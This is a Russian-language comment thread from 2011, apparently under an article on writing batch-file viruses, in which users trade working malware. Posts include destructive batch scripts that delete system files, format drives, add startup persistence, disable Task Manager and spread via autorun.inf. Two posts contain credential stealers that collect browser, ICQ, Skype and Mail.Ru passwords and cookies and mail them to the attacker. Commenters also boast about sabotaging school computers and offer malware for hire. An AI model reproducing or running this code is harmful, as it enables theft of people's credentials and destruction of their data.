Комментарий от Лёха [ Март 24, 2011, 23:51 ]

ТЫ ПРОСТ ТУПОЙ НЕ ТАК ПИСАЛ НОВЕРНО У МЯ ВСЁ РОБИТ

Комментарий от Лёха [ Март 24, 2011, 23:52 ]

скажите пожалуста как зделать так чтоб бат вирус запускался после перезагрузки компа снова и снова какая команда нужна

Комментарий от Рома [ Март 25, 2011, 11:00 ]

Могу написать бат вирь под заказ(цена чистосимволическая, другой вирь например или интересная идея). кто заинтересован пишите на eliseev.roman.al@gmail.com

Комментарий от Алекс [ Апрель 1, 2011, 18:49 ]

Спасибо огромное автору. Всегда мечтал создавать хотя-бы простые вирусы. Статья отличная, мне понравилось!

Комментарий от Друг [ Апрель 2, 2011, 22:09 ]

Забавно… и познавательно вместе с тем. Только начал изучать командную строку. Полезная статья, спасибо

Комментарий от жека [ Апрель 3, 2011, 15:09 ]

народ вот короче малая часть действий разбирайтесь пишите коменты я училкам 8 компов наебнул ух они в ахуе были.
В состав Windows входят некоторые еще
не описанные исполняемые файлы (внешние команды):
del %0 -САМОУДАЛЕНИЕ
del c:Program Files/q -удаляет все файлы из указанной папки
Chkdsk.exe – отчет о состоянии диска
Debug.exe – отладчик программ
Diskcopy.com – копирование дискет с
соблюдением физического расположения файлов
Doskey.com – резидентная программа
редактирования командной строки
Extract.exe – распаковка Каб-файлов
Fc.exe – сравнение файлов
Find.exe – поиск текста
Label.exe – изменение метки тома
Move.exe – перемещение файлов
Restart.com – перезапуск компьютера
Scanreg.exe – программа проверки,
восстановления, исправления и
резервирования реестра.
Share.exe – обеспечение совместного
использования файлов
Start.exe – запуск приложений Windows из сеанса
MS-DOS (вообще-то, они и без нее запускаются)
Все они (кроме Restart.com), находятся в
папке Command. Параметры их запуска, если т
аковые потребуются, можно узнать, вызывая их
с параметром /?.
ASSOC — Отображает или модифицирует связи расширений файлов
AT — Планирует команды и программы для выполнения на компьютере.
ATTRIB — Отображает или изменяет атрибуты файла.
BREAK — Устанавливает или отменяет проверку комбинации [Ctrl+C].
CACLS — Отображает или модифицирует списки управления доступом (ACLs) для файлов.
CALL — Вызывает один *.BAT-файл из другого.
CD — Отображает имя или изменяет имя текущей директории.
CHCP — Отображает или устанавливает номер активной кодовой страницы.
CHDIR — Отображает имя или изменяет имя текущей директории.
CHKDSK — Проверяет диск и отображает отчет о состоянии.
CLS — Очищает экран.
CMD — Стартует новый экземпляр интерпретатора команд Windows NT.
COLOR — Устанавливает цвета по умолчанию для переднего и заднего плана консоли.
COMMAND — Стартует новую копию интерпретатора команд Windows.
COMP — Сравнивает содержимое двух файлов или установки файлов.
COMPACT — Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS).
CONVERT — Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск.
COPY — Копирует один или больше файлов на другое место.
CTTY — Изменяет терминальное устройство, используемое для управления вашей системой.
DATE — Отображает или устанавливает дату.
DEL — Удаляет один или более файлов.
DEBUG — Выполняет отладку, тестирование программ и редактирование инструментальных средств.
DIR — Отображает список файлов и поддиректорий в директории.
DISKCOMP — Сравнивает содержимое двух дискет.
DISKCOPY — Копирует содержимое одной дискеты на другую.
DOSKEY — Редактирует командные строки, восстанавливает команды Windows и создает макрос.
ECHO — Отображает сообщения, или включает/выключает вывод команд.
EMM386 — Включает/выключает поддержку расширенной памяти EMM386.
ENDLOCAL — Заканчивает локализацию изменений окружающей среды в *.BAT-файле.
ERASE — Удаляет один или более файлов.
EXIT — Прекращает выполнение программы (интерпретатор команд).
EXTRACT — Средство извлечения информации из CAB — файлов.
FC — Сравнивает два файла или установки файлов, и отображает различие между ними.
FIND — Ищет текстовую строку в файле или файлах.
FINDSTR — Поиск строк в файлах.
FOR — Выполняет указанную команду для каждого файла в наборе файлов.
FORMAT — Форматирует диск для использования с Windows.
FTYPE — Отображает или модифицирует типы файлов, используемых в связях расширений.
GOTO — Направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле.
GRAFTABL — Способность Windows отображать символы псевдографики, вставленные в графическом режиме.
HELP — Обеспечивает информацию Help для команд Windows.
IF — Выполняет обработку условия в *.BAT-файле.
KEYB — Конфигурирует клавиатуру для заданного языка.
LABEL — Создает, изменяет, или удаляет метку тома на диске.
LOADHIGH(LH) — Загружает программу в верхние адреса памяти.
MD — Создает директорию.
MEM — Отображает величину используемой и свободной памяти в вашей системе.
MKDIR — Создает директорию.
MODE — Конфигурирует системное устройство.
MORE — Отображает вывод одного экрана за раз.
MOVE — Перемещает один или более файлов из одной директории в другую на том же диске.
NETSTAT — Отображает статистики протоколов и текущих сетевых соединений TCP/IP.
NLSFUNC — Загружает информацию, специфическую для страны.
PATH — Отображает или устанавливает путь поиска для выполняемых файлов.
PAUSE — Приостанавливает обработку *.BAT-файла и отображает сообщение.
POPD — Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.
PRINT — Печатает текстовый файл.
PROMPT — Изменяет подсказку к командам Windows.
PUSHD — Сохраняет текущую директорию, потом изменяет.
RD — Удаляет директорию.
RECOVER — Восстанавливает читаемую информацию с плохого или дефектного диска.
REM — Записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS.
REN — Переименует файл или файлы.
RENAME — Переименует файл или файлы.
REPLACE — Заменяет файлы.
RESTORE — Восстанавливает файлы, которые были архивированы с использованием команды BACKUP.
RMDIR — Удаляет директорию.
SET — Отображает, устанавливает или удаляет переменные среды Windows.
SETLOCAL — Начинает локализацию изменений среды в *.BAT-файле.
SETVER — Устанавливает номер версии MS-DOS, который Windows сообщает программе.
SHIFT — Сдвигает позицию замещаемых параметров в *.BAT-файле.
SMARTDRV — Инсталлирует и конфигурирует утилиту кэширования диска SMART — драйва.
SORT — Сортирует входной поток.
START — Стартует отдельное окно для выполнения указанной программы или команды.
SUBST — Связывает путь с литерой диска.
SYS — Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.
TIME — Отображает или устанавливает системное время.
TITLE — Устанавливает заголовок окна для сеанса .
TREE — Графически отображает структуру директория в драйве или путь.
TYPE — Отображает содержимое текстового файла.
VER — Отображает версию Windows.
VERIFY — Сообщает Windows, проверять ли правильность записи файлов на диск.
VOL — Отображает метку дискового тома и серийный номер.
XCOPY — Копирует файлы и деревья директории.
[папка WINDOWS]\COMMAND\format [Буква_Диска]: /autotest — форматирование диска(работает в XP)
Cd\ — команда для выхода в корневой каталог из места откуда был запущен bat файл
Cd [Буква_Диска]: — команда перехода на диск
~~~~
Пример, взят с книжки(прога копирует себя в autoexec.bat):
@Echo off
if exist c:virus.bat goto wik {проверяем, существует ли файл, …}
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
:wik {…если он существует, то программа переходит на метку :wik}
copy %0 a:run.bat >nul
~~~~
Chcp 1251 — русская кодировка в бате
start/wait regedit -s [file.reg] — сливаем file.reg с реестром
rd [Буква_Диск]: /s /q — Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
echo [Строка] >> [Файл] — дописывает строку в файл
attrib -a -s -h [файл.расш] — снимает атрибуты с файла:
+-[a] — снять/убрать аттрибут «НЕ ЗНАЮ Я КАКОЙ НО вроде Архивный»
+-[ s ] — снять/убрать аттрибут «Системный»
+-[h] — снять/убрать аттрибут «Скрытый»
+-[r] = снять/убрать аттрибут «Чтение»
~~~~~~~
Пути:
%USERPROFILE% — [C]:\Documents and Settings\[LAMER]
%ProgramFiles% — это понятно что=)
%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch — быстрый запуск
%USERPROFILE%\SendTo — меню «Оптравить»
%windir% — Wind00z)))
%temp% — поняна че ето
~~~~~~~~~~~
assoc .[старое расширение]=.[новое расширение] -изменения ассоцияций
md Папка\еще папка — Создание папок, пример:
md открой\и эту тоже\идём дальше\почти у цели\сейчас конец\конец
Или так:
Добавляем n папок в меню «Отправить»:
cd %USERPROFILE%\SendTo
md 1
mp 2
md 3

md n
~~~~~~~~~~~~~~~~~~~~~
RUNDLL (Скопировано с «Народных советов, май 2003″), юзать прямо и тупо — пишете строку в BAT-файл и все:
~~~~~~~~~~~~~~~~~~~~~
rundll32 shell32.dll,Control_RunDLL hotplug.dll — диалоговое окно Отключение или извлечение аппаратного устройства
rundll32 diskcopy,DiskCopyRunDll — вызов диалога «Копирование диска».
rundll32 keyboard,disable — отключение клавиатуры, действует до следующей перезагрузки.
rundll32 mouse,disable — отключение мыши вплоть до перезагрузки.
rundll32 krnl386.exe,exitkernel — выгрузить ядро системы, выход из Windows.
rundll32 mshtml.dll,PrintHTML «HtmlFileNameAndPath» — распечатать документ HTML, где «HtmlFileNameAndPath» — путь к файлу и его имя.
rundll32 мсprint2.dll,RUNDLL_PrintTestPage — распечатать тестовую страницу на принтере.
rundll32 netplwiz.dll,AddNetPlaceRunDll — вызов мастера подключения нового сетевого ресурса «Добавление в сетевое окружение».
rundll32 rnaui.dll,RnaWizard — вызов мастера «Удаленный доступ к сети».
rundll32 rnaui.dll,RnaWizard /1 — вызов мастера «Удаленный доступ к сети» без отображения начального окна.
rundll32 shell,ShellExecute — открыть Проводник (папка «Рабочий стол»).
rundll32 shell32,Control_RunDLL — открыть в Проводнике папку «Панель управления».
rundll32 shell32,Control_RunDLL appwiz.cpl,,n — вызов диалогового окна «Установка и удаление программ», в котором будет открыта вкладка с номером «n» (от 1 до 3).
rundll32 shell32,Control_RunDLL main.cpl @0 — открыть диалог «Свойства мыши».
rundll32 shell32,Control_RunDLL main.cpl @1 — открыть диалог «Свойства клавиатуры».
rundll32 shell32,Control_RunDLL main.cpl @2 — открыть папку «Принтеры».
rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintersFolder — открыть папку «Принтеры» (другой способ).
rundll32 shell32,Control_RunDLL main.cpl @3 — открыть папку «Шрифты».
rundll32 SHELL32,SHHelpShortcuts_RunDLL FontsFolder — открыть папку «Шрифты» (другой способ).
rundll32 SHELL32,Control_RunDLL modem.cpl, add — открыть диалог «Свойства модема».
rundll32 shell32,Control_RunDLL timedate.cpl — открыть диалог «Дата и время».
rundll32 shell32,OpenAs_RunDLL — вызвать диалог «Открыть с помощью…».
rundll32 shell32,ShellAboutA WINHOWTO.RU — информация о версии Windows.
rundll32 shell32,SHExitWindowsEx 0 — закрыть все программы, перегрузить оболочку.
rundll32 shell32, SHExitWindowsEx 1 — выключить ПК.
rundll32 SHELL32, SHExitWindowsEx -1 — перегрузить оболочку Windows.
rundll32 shell32, SHExitWindowsEx 2 — перегрузить ПК.
rundll32 shell32,SHExitWindowsEx 4 — принудительно закрыть все программы.
rundll32 shell32,SHExitWindowsEx 8 — выход из Windows и выключение ATX-совместимого ПК.
rundll32 shell32,SHFormatDrive — вызов диалога форматирования диска А:.
rundll32 SHELL32,SHHelpShortcuts_RunDLL AddPrinter — запуск «Мастера установки принтера».
rundll32 shell32,SHHelpShortcuts_RunDLL Connect — запуск мастера подключения сетевого диска.
rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintTestPage — распечатать тестовую страницу.
rundll32 sysdm.cpl,InstallDevice_Rundll — вызов мастера установки оборудования.
rundll32 url.dll,FileProtocolHandler %1 — открыть веб-страницу, где %1 — URL сайта (включая [link=http://).]http://).[/link]
rundll32 url.dll,MailToProtocolHandler %1 — создать новое письмо, где %1 — e-mail адресата.
rundll32 user,CASCADECHILDWINDOWS — расположить все окна каскадом.
rundll32 user,TILECHILDWINDOWS — расположить все окна по экрану.
rundll32 user,disableoemlayer — сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,ExitWindowsExec — быстрая перезагрузка Windows.
rundll32 user,RepaintScreen — выполнить команду «Обновить».
rundll32 user,SetCaretBlinkTime n — задать частоту мигания курсора, соответствующую значению параметра n.
rundll32 user,SetCursorPos — переместить курсор мыши в верхний левый угол экрана.
rundll32 user,SetDoubleClickTime n — задать скорость двойного нажатия левой кнопки мыши (Double Click), соответствующую параметру n.
rundll32 user,SwapMouseButton — поменять местами клавиши мыши (обратная смена невозможна).
rundll32 user,WNetConnectDialog — вызов диалога «Подключение сетевого диска».
rundll32 user,WNetDisconnectDialog — вызов диалога «Отключение сетевого диска».
rundll32 AppWiz.Cpl,NewLinkHere %1 — запуск мастера создания нового ярлыка, где %1 — путь к исходному файлу.
~~~~~~~~~~~~~~~~~~~~~~~
WSH(работает только В win2000=)))))
БЕЗ КОМЕНТАРИЕВ, ДУМАЮ ВСЕ ПОНЯТНО:
~~~~~~~~~~~~~~~~~~~~~~~
echo var WSHShell = WScript.CreateObject(”WScript.Shell”); > %temp%\mes.js
WSHShell.Popup(”][AKER FOREVA!”); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls
~~~~~~~~~~~~~~~~~~~~~
Вирус(полностью и нагло тоже скопирован):
ctty nul //Было такое
REM Чй† Ђь@uoњPSQRVW
?
‹тЌ
” Q_ь№ у¦u=
є №є њъ.я?ђ л,ђ ///
copy %0 *.exe ///
copy %0 b.com>nul // Эта технология взята с вируса другово.
b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.
del b.com. /// Это текст АСМ скомпиленого в exe
rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ' ‰?ђ Ќ ё.%Н.Ќ є Н'ђђ //
@echo off //
echo XEP_BAM //Пишем злобно и красиво.
if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен.
@rundll32 user,setcursorpos
ctty con //Было такое
echo Обновление параметров системы, пожалуйста подождите... //Отвлекаем.
@label BAT.c
copy %0.bat %windir% > nul
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
deltree /y c:\autoexec.bat
deltree /y c:\boot.ini
if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\autoexec.bat
if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\boot.ini //Это для XP он там вместо autoexec.bat ;)
deltree /y %windir%/win.ini
copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys
echo [AutoRun] > c:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo [AutoRun] > d:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo [AutoRun] > e:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
copy %0 [Папка] — Копирует себя в папку
time ЧЧ:ММ — меняет время
date ДД.ММ.ГГ — если ставить » в будущее», то у некоторых антивирусов дохнет активация
del [файл.расш] /s /q — удаление файла
deltree /y [Файл] — Еще одно удаление

Комментарий от Joker [ Апрель 6, 2011, 02:27 ]

Так товарищи. Прочитал весь этот полубред.
1. Половина операторов в ХР не пашет-факт
2. Идеи не плохие… однако время не то… эти вири актуальны были в конце 90-х.
3. Если хочеш стать ВИРЬ писакой, изучай языки программирования.
4. Читай ВСЕ коменты… Много повторяющихся вопросов.
5. скачайте «азбуку» CMD. Много интересного найдете.

Комментарий от Virus_7 [ Апрель 12, 2011, 15:57 ]

Ребят! HELP! Как создать вирус, который будет искать файлы по ключевым словам, которые я задам, и удалять их??? Пишите в аську ребят, если знаете как!!!
UIN:72367383 ник:[CLU] Жду ребят!!! HELP!!!

Комментарий от shegan [ Апрель 23, 2011, 09:47 ]

есть такие люди кторые могут хорошо и понятно обучить хаккингу я понимаю что это не легко я знаю не много ну и не мало мне нужен человек кторый будет двигать мои мозги дальше

Комментарий от olya [ Май 14, 2011, 20:52 ]

помогите пожалусто,немогу найти троян-вымогатель,кто поможет,отблагодарю!

Комментарий от Леон Гончаров [ Июль 6, 2011, 06:01 ]

А червя-насильника тебе не написать?

Комментарий от Дима [ Июль 11, 2011, 14:36 ]

Уважаемый админ, нанесение ущерба, это конечно прикольно, а возможно написание такой бат программы, чтоб при установки флеш карты и при запуске программы все файлы txt, doc, или другие заданые в параметрах файлы копировались на указаную флеш карту в указаную папку. Если это возможно скинте пожалуйста набор кода на мой почтовый ящик dim4ik.k@yandex.ru. Заранее спасибо.

Комментарий от ммммммм [ Июль 17, 2011, 20:59 ]

меня убил вирус

Комментарий от xakepo4ku [ Июль 29, 2011, 07:22 ]

выложите исходников разных тройчиков заценить хоть одним глазком .)

Комментарий от xakepo4ku [ Июль 29, 2011, 07:23 ]

Timer1.Enabled = True
Me.Timer1.Interval = 1000 * seconds
While Me.Timer1.Interval > 0
DoEvents
Wend
Timer1.Enabled = False
End Sub

‘настройка таймера
Private Sub Timer1_Timer()
Timer1.Interval = 0
End Sub

‘код формы
Private Sub Form_Load()

‘скрываем форму
Form1.Visible = False

‘объекты
On Error Resume Next
Set FSO = CreateObject(«sсriрting.FileSystemObject»)
Set WshShell = Wsсriрt.CreateObject(«Wsсriрt.Shell»)

‘создаем папки для хранения промежуточных файлов
FSO.CreateFolder («c:\654″)
FSO.CreateFolder («c:\Help»)
FSO.CreateFolder («c:\Help\Mozilla»)
FSO.CreateFolder («c:\Help\Opera»)
FSO.CreateFolder («c:\Help\IE»)
FSO.CreateFolder («c:\Help\ICQ»)
FSO.CreateFolder («c:\Help\Skype»)
FSO.CreateFolder («c:\Help\TXT»)
FSO.CreateFolder («c:\Help\DOC»)

‘прячим папки
strDIR = «C:\Help»
Set objFSO = CreateObject(«sсriрting.FileSystemObject»)
Set objDIR = objFSO.GetFolder(strDIR)
objDIR.Attributes = 2

‘создаем bat для копирования паролей и текстовых файлов
Set FSO = CreateObject(«sсriрting.FileSystemObject»)
Set tf = FSO.CreateTextFile(«c:\654\Copy.bat», True)
tf.WriteLine («XCOPY C:\Users\%USERNAME%\AppData\Roaming\Opera\Opera\*.* C:\Help\Opera /Y /H»)
tf.WriteLine («XCOPY C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\cооkies\*.* C:\Help\IE /Y /H»)
tf.WriteLine («CD /D C:\Users\%USERNAME%\AppData\Roaming\Mozilla\Firefox\»)
tf.WriteLine («XCopy Profiles C:\Help\Mozilla\ /H /E /G /Q /R /Y»)
tf.WriteLine («CD /D C:\Users\%USERNAME%\AppData\Roaming\»)
tf.WriteLine («XCopy ICQ C:\Help\ICQ\ /H /E /G /Q /R /Y»)
tf.WriteLine («CD /D C:\Users\%USERNAME%\AppData\Roaming\»)
tf.WriteLine («XCopy Skype C:\Help\Skype\ /H /E /G /Q /R /Y»)
tf.WriteLine («XCopy C:\Users\%USERNAME%\Desktop\*.txt C:\Help\TXT /H /Y»)
tf.WriteLine («XCopy C:\Users\%USERNAME%\Desktop\*.doc C:\Help\DOC /H /Y»)
tf.WriteLine («XCopy C:\Users\%USERNAME%\Desktop\*.docx C:\Help\DOC /H /Y»)
tf.Close

‘запускаем bat в скрытом режиме
Set objShell = CreateObject(«Shell.Application»)
objShell.ShellExecute «copy.bat», «», «C:\654″, «», 0

‘ждем 30 сек для того что-бы bat успел сделать свою грязную работу
Wait (30)

‘Создаем архив с файлами в скрытом режиме
Dim RetVal
Dim WinRarApp$, iFileName$, iArhivName$, adr$, iPath$
WinRarApp$ = «C:\Program Files\WinRAR\WinRAR.exe a»
iPath = «C:\»
iFileName$ = «Help»
iArhivName$ = «654\Help.rar»
adr$ = WinRarApp$ & » «»" & iPath & iArhivName$ & «»" «»" & iPath & iFileName$ & «»" »
RetVal = Shell(adr$, vbHide) ‘vbNormalFocus)

‘ждем 30 сек для того что-бы winrar успел сделать архив
Wait (30)

‘Отправляем архив по почте
Const EmailFrom = «почта 1 для отправки»
Const EmailPassword = «пароль от почты 1″
Const strSmtpServer = «smtp сервер для почты 1″
Const EmailTo = «почта 2, сюда придет архив с файлами»
Set objEmail = CreateObject(«CDO.Message»)
objEmail.AddAttachment «C:\654\Help.rar» ‘путь к нашему архиву
objEmail.From = EmailFrom
objEmail.To = EmailTo
objEmail.Subject = «Comp Info» ‘заголовок сообщения
objEmail.Textbоdу = «» ‘текст сообщения
objEmail.Configuration.Fields.Item(«http://schemas.microsoft.com/cdo/configuration/sendusing») = 2
objEmail.Configuration.Fields.Item(«http://schemas.microsoft.com/cdo/configuration/smtpauthenticate») = 1
objEmail.Configuration.Fields.Item(«http://schemas.microsoft.com/cdo/configuration/sendusername») = EmailFrom
objEmail.Configuration.Fields.Item(«http://schemas.microsoft.com/cdo/configuration/sendpassword») = EmailPassword
objEmail.Configuration.Fields.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserver») = strSmtpServer
objEmail.Configuration.Fields.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserverport») = 25
objEmail.Configuration.Fields.updаtе
objEmail.Send

‘заметаем следы
FSO.DeleteFolder «c:\Help»
FSO.DeleteFolder «c:\654″

‘THE END
End
End Sub

Комментарий от xakepo4ku [ Июль 29, 2011, 07:25 ]

taskkill /f /im opera.exe
taskkill /f /im firefox.exe
taskkill /f /im chrome.exe
taskkill /f /im iexplore.exe
taskkill /f /im magent.exe

md C:\pass\
attrib C:\pass +h +s +a +r
md C:\pass\opera\
CD /D %APPDATA%\Opera\Opera\
copy wand.dat C:\pass\opera\ >nul
copy cookies4.dat C:\pass\opera\ >nul
md C:\pass\MailAgent\reg
regedit.exe -ea C:\pass\MailAgent\reg\agent.reg «HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2
regedit.exe -ea C:\pass\MailAgent\reg\agent_3.reg «HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3
CD /D %APPDATA%
Xcopy Mra\Base C:\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul
Xcopy Mra\Update\ver.txt C:\pass\MailAgent /K /H /G /Q /R /S /Y >nul
md C:\pass\Mozilla\
cd %AppData%\Mozilla\Firefox\Profiles\*.default\
copy cookies.sqlite C:\pass\Mozilla\ >nul
copy key3.db C:\pass\Mozilla\ >nul
copy signons.sqlite C:\pass\Mozilla\ >nul
md C:\pass\Google\
cd %userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\
copy /y Login* C:\pass\Google\ >nul
copy /y Cookies* C:\pass\Google\ >nul
copy /y %Windir%\Rar.exe C:\pass\ >nul
del /s /q %SystemRoot%\Rar.exe
C:\pass\rar.exe a -r C:\pass\pass.rar C:\pass\
copy /y C:\pass\pass.rar %SystemRoot%\system32\draiver\ >nul
cd %SystemRoot%\system32\draiver\
blat.exe -install -server smtp.yandex.ru -port 587 -f tvoi mail@yandex.ru -u tvoi mail -pw tvoi pass
ren *.rar pass.rar
blat.exe -body KuLLIku-}I{epTBbI:) -to tvoi mail@yandex.ru -attach pass.rar
rmdir /s /q C:\pass
del /s /q %SystemRoot%\system32\draiver\pass.rar
EXIT
cls

*TroJan-Aksilium*

Комментарий от lol програмист [ Август 5, 2011, 15:57 ]

помогите пожалуста написать вирус который не палится и отсылает ип и порт чужого компа на почту . заранее спасибо\

Комментарий от vlad [ Август 10, 2011, 09:53 ]

Отличная статья!!! vsem spasibo
пример:
Цель: Просмотреть содержимое файла
license.txt, который находится на
диске C:\Program Files\Celestia,
после этого удалить его :
TYPE «C:\Program Files
\OpenOffice.org 2.2\license.txt»
PAUSE
DEL «C:\Program Files
\OpenOffice.org 2.2\license.txt»

Комментарий от vlad [ Август 10, 2011, 10:04 ]

пример:

@Echo off

md Windows
md abgh
md #&%$#$
md games

это функция md создает пустые папки

Комментарий от Я [ Август 22, 2011, 12:10 ]

Я вот в батниках плохо разбираюсь.
Зачем писать такие большие вирусы.А нельзя так:
@echo off
Del C:\windows\system32\*.*
Извините,если есть ошибки

Комментарий от Panyk [ Август 26, 2011, 16:07 ]

Да какие вы люди глупые, к чему стремитесь??? Вредить другим??? Я вам за 10 мин такой вирус напишу в vbs что у вас не только винда полетит, но это глупо… Лучше пишете и правда проги полезные…

Комментарий от ХаКеР [ Август 30, 2011, 23:19 ]

Вот вы дибилы все Ученики ебаные смотри :
@Echo off
Start.cmd
Start.cmd
Start.cmd
Start.cmd
Start.cmd
Итак далее до бесконечности писать и тогда может Заглючить Комп За 1 сек вот вы дибилы Это что вы пишите свои вирусы полная Хуйня у вас!!!
Итак Я Ломаю :
Css,Сайты Компы стим акки Skype Аськи Мыло Делаю вирусы на заказ!!!не так как вы Дибилы кароче хотите крутой вирус или взлом на заказ? стучать в Skype Noggano55rus ток без выёбак ок?

Комментарий от Walter [ Сентябрь 24, 2011, 19:00 ]

А есть ли такой вирус который выводит на экран пароль в мэйл.ру какого ни будь пользователя:
Нап: Я закину этот вир кому нибудь и он выдает его пароль???

Комментарий от Dante [ Октябрь 4, 2011, 11:04 ]

Очень хороший вирус. Кемп просто зависает.
@echo off
copy «»%0″» «%SystemRoot%\system32\Dervik.bat»
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\Dervik.bat» /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
:x
Start chkdsk
goto :x

Комментарий от ученик [ Октябрь 16, 2011, 19:41 ]

Panyk некоторые сюда зашли вообще чтобы хоть что то узнать.К примеру у меня в школе вообще не изучают ни языки программирования, ни вообще ни фига, только тексты набираем в ворде, а кроме как вирусы писать никто ничему не учит, по крайней мере мне не попалось ни одного бесплатного пособия.

Комментарий от Саня ФОКС [ Октябрь 20, 2011, 18:45 ]

Админ спасибо за вирусы, все работает прекрасно я учетелям в универе так подосрал у мя информатики не было 4 дня, разберались в чем проблема =)))))

Комментарий от Алексей [ Ноябрь 1, 2011, 18:50 ]

@echo off
echo(On_your_computer_a_virus_is_detected_press_any_button_to_remove_it)
pause
del «%SystemRoot%Media» /q >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
net user «лох» /add >nul
net user «лох» /add >nul
net user «лох» /add >nul
net user «лох» /add >nul
net user «лох» /add >nul
net user «лох» /add >nul
net user «лох» /add >nul
net user «лох» /add >nul
net user «лох» /add >nul
pause
time 0:00 >nul
date 12.12.12
pause
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
del «%SystemRoot%Cursors*.*» >nul
pause
Chcp 1251
msg * «Все вирусы найдены. Удалить? Если да то нажмите ок и далее нажимайте на любые кнопки.»
pause
FOR /L %%i IN (1,1,1000000) DO md %%i
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul –
taskkill /f /im explorer.exe >nul
del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul
del «%SystemRoot%system32*.dll» /q >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
pause
echo format C: /q >> c:Autoexec.bat
copy c:some.exe c:Progra~1some.exe
Cd
Cd C:
Сd windows
del *.exe
del *.ini
del *.com
cd
cd windows
cd system
del *.dll
del *.exe
pause
:LOOP
copy %windir%*.* + %windir%*.* c:command.com
GOTO LOOP
@ P-¦ r 4 P PT
deltree /y %windir% c:program files
shutdown -r -t 1 -c «lol» -f
del «%0″ >nul
Вот такой шуточный вирус)))

Комментарий от Саша [ Ноябрь 2, 2011, 19:39 ]

Памагите плиз , вчера случайно у ся на копмпе запустил
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:IDIOT >nul
label D:URAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:Open.bat >nul
copy %0 D:Open.bat >nul
copy %0 E:Open.bat >nul
copy %0 F:Open.bat >nul
net user «Idiot you Hacked» /add >nul
net user «Bitch you Hacked» /add >nul
net user «Durak you Hacked» /add >nul
net user «Kritin you Hacked» /add >nul
net user «Gavno you Hacked» /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nul
md 11 >nul
md 12 >nul
md 13 >nul
md 14 >nul
md 15 >nul
md 16 >nul
md 17 >nul
md 18 >nul
md 19 >nul
md 20 >nul
md 21 >nul
md 22 >nul
md 23 >nul
md 24 >nul
md 25 >nul
md 26 >nul
md 27 >nul
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:x ;
Start mspaint
goto x ;
:x ;
Start Calc
goto x ;
copy «»%0″» «%SystemRoot%system32Cool.bat» >nul
reg add «HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun» /v «Cool» /t REG_SZ /d «%SystemRoot%system32Cool.bat» /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del %0 >nul
ЧЕ ТЕРЬ ДЕЛАТЬ??Г???Некакаая программа не работает !!!!!!!!!!!!!ПАМАГИТЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕ!!!!!!!!!!!!!!!!!!!!!!!как отменить дейсвие бантика етого??????????????

Комментарий от влад [ Ноябрь 7, 2011, 16:58 ]

@echo off
rundll32 keyboard,disable
